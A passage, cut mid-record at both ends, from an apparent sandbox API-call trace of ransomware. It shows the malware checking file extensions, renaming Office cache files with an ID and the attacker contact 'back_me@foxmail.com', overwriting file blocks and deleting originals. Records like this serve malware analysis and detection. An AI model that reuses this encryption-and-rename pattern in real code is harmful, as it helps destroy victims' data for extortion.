(lpString1=".7z", lpString2="dll") returned -1 [0051.065] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0051.065] lstrlenW (lpString=".dbf") returned 4 [0051.065] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0051.065] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0051.065] lstrlenW (lpString=".1cd") returned 4 [0051.065] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0051.065] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0051.066] lstrlenW (lpString=".jpg") returned 4 [0051.066] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0051.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0051.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0051.066] lstrlenW (lpString=".doc") returned 4 [0051.066] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0051.066] lstrlenW (lpString=".docx") returned 5 [0051.066] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0051.066] lstrlenW (lpString=".pdf") returned 4 [0051.066] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0051.066] lstrlenW (lpString=".xls") returned 4 [0051.066] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0051.066] lstrlenW (lpString=".xlsx") returned 5 [0051.066] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0051.066] lstrlenW (lpString=".ppt") returned 4 [0051.066] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0051.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0051.066] lstrlenW (lpString=".zip") returned 4 [0051.066] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0051.066] lstrlenW (lpString=".rar") returned 4 [0051.066] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0051.066] lstrlenW (lpString=".bz2") returned 4 [0051.066] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0051.066] lstrlenW (lpString=".7z") returned 3 [0051.066] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0051.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0051.066] lstrlenW (lpString=".dbf") returned 4 [0051.066] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0051.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0051.066] lstrlenW (lpString=".1cd") returned 4 [0051.066] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0051.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0051.066] lstrlenW (lpString=".jpg") returned 4 [0051.066] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0051.067] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0051.067] lstrlenW (lpString="PrjPrrWW.cab") returned 12 [0051.067] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0051.067] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=162970271) returned 1 [0051.067] CloseHandle (hObject=0x1c0) returned 1 [0051.067] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab")) returned 0x2020 [0051.067] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0051.067] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0051.068] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0051.068] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0051.068] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.068] ReadFile (in: hFile=0x1c0, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.079] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.079] ReadFile (in: hFile=0x1c0, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.083] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0051.083] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.083] ReadFile (in: hFile=0x1c0, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.098] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.098] WriteFile (in: hFile=0x1c0, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0051.273] SetEndOfFile (hFile=0x1c0) returned 1 [0051.273] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0051.277] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.277] WriteFile (in: hFile=0x1c0, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.278] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.278] WriteFile (in: hFile=0x1c0, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.281] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.281] WriteFile (in: hFile=0x1c0, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.283] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0051.283] CloseHandle (hObject=0x1c0) returned 1 [0051.283] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0051.283] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.283] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.283] lstrlenW (lpString=".doc") returned 4 [0051.283] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0051.283] lstrlenW (lpString=".docx") returned 5 [0051.283] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0051.283] lstrlenW (lpString=".pdf") returned 4 [0051.283] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0051.283] lstrlenW (lpString=".xls") returned 4 [0051.284] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0051.284] lstrlenW (lpString=".xlsx") returned 5 [0051.284] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0051.284] lstrlenW (lpString=".ppt") returned 4 [0051.284] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0051.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.284] lstrlenW (lpString=".zip") returned 4 [0051.284] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0051.284] lstrlenW (lpString=".rar") returned 4 [0051.284] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0051.284] lstrlenW (lpString=".bz2") returned 4 [0051.284] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0051.284] lstrlenW (lpString=".7z") returned 3 [0051.284] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0051.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.284] lstrlenW (lpString=".dbf") returned 4 [0051.284] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0051.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.284] lstrlenW (lpString=".1cd") returned 4 [0051.284] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0051.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.284] lstrlenW (lpString=".jpg") returned 4 [0051.284] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0051.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.284] lstrlenW (lpString=".doc") returned 4 [0051.284] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0051.284] lstrlenW (lpString=".docx") returned 5 [0051.284] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0051.284] lstrlenW (lpString=".pdf") returned 4 [0051.284] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0051.284] lstrlenW (lpString=".xls") returned 4 [0051.284] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0051.285] lstrlenW (lpString=".xlsx") returned 5 [0051.285] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0051.285] lstrlenW (lpString=".ppt") returned 4 [0051.285] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0051.285] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.285] lstrlenW (lpString=".zip") returned 4 [0051.285] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0051.285] lstrlenW (lpString=".rar") returned 4 [0051.285] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0051.285] lstrlenW (lpString=".bz2") returned 4 [0051.285] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0051.285] lstrlenW (lpString=".7z") returned 3 [0051.285] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0051.285] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.285] lstrlenW (lpString=".dbf") returned 4 [0051.285] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0051.285] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.285] lstrlenW (lpString=".1cd") returned 4 [0051.285] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0051.285] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.285] lstrlenW (lpString=".jpg") returned 4 [0051.285] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0051.285] lstrcmpiW (lpString1=".exe", lpString2=".php") returned -1 [0051.285] lstrlenW (lpString="ose.exe") returned 7 [0051.285] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.438] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=174440) returned 1 [0051.438] CloseHandle (hObject=0x21c) returned 1 [0051.438] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0051.438] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0051.439] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.439] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.439] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.439] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0051.485] GetLastError () returned 0x0 [0051.492] ReadFile (in: hFile=0x21c, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x2a968, lpOverlapped=0x0) returned 1 [0051.534] WriteFile (in: hFile=0x194, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0051.537] ReadFile (in: hFile=0x21c, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.537] WriteFile (in: hFile=0x194, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0051.537] SetEndOfFile (hFile=0x194) returned 1 [0051.538] CloseHandle (hObject=0x194) returned 1 [0051.538] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.538] SetEndOfFile (hFile=0x21c) returned 1 [0051.540] CloseHandle (hObject=0x21c) returned 1 [0051.540] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0051.540] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0051.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0051.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0051.540] lstrlenW (lpString=".doc") returned 4 [0051.540] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0051.540] lstrlenW (lpString=".docx") returned 5 [0051.540] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0051.540] lstrlenW (lpString=".pdf") returned 4 [0051.540] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0051.540] lstrlenW (lpString=".xls") returned 4 [0051.540] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0051.540] lstrlenW (lpString=".xlsx") returned 5 [0051.541] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0051.541] lstrlenW (lpString=".ppt") returned 4 [0051.541] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0051.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0051.541] lstrlenW (lpString=".zip") returned 4 [0051.541] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0051.541] lstrlenW (lpString=".rar") returned 4 [0051.541] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0051.541] lstrlenW (lpString=".bz2") returned 4 [0051.541] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0051.541] lstrlenW (lpString=".7z") returned 3 [0051.541] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0051.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0051.541] lstrlenW (lpString=".dbf") returned 4 [0051.541] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0051.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0051.541] lstrlenW (lpString=".1cd") returned 4 [0051.541] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0051.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0051.541] lstrlenW (lpString=".jpg") returned 4 [0051.541] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0051.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0051.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0051.541] lstrlenW (lpString=".doc") returned 4 [0051.541] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0051.541] lstrlenW (lpString=".docx") returned 5 [0051.541] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0051.541] lstrlenW (lpString=".pdf") returned 4 [0051.541] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0051.541] lstrlenW (lpString=".xls") returned 4 [0051.541] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0051.541] lstrlenW (lpString=".xlsx") returned 5 [0051.542] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0051.542] lstrlenW (lpString=".ppt") returned 4 [0051.542] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0051.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0051.542] lstrlenW (lpString=".zip") returned 4 [0051.542] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0051.542] lstrlenW (lpString=".rar") returned 4 [0051.542] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0051.542] lstrlenW (lpString=".bz2") returned 4 [0051.542] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0051.542] lstrlenW (lpString=".7z") returned 3 [0051.542] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0051.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0051.542] lstrlenW (lpString=".dbf") returned 4 [0051.542] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0051.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0051.542] lstrlenW (lpString=".1cd") returned 4 [0051.542] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0051.542] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0051.542] lstrlenW (lpString=".jpg") returned 4 [0051.542] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0051.542] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0051.542] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0051.542] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.543] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=36233052) returned 1 [0051.543] CloseHandle (hObject=0x21c) returned 1 [0051.543] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0051.543] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0051.543] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0051.543] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.543] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0051.544] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.544] ReadFile (in: hFile=0x21c, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.100] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.100] ReadFile (in: hFile=0x21c, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.104] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0052.104] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.104] ReadFile (in: hFile=0x21c, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, 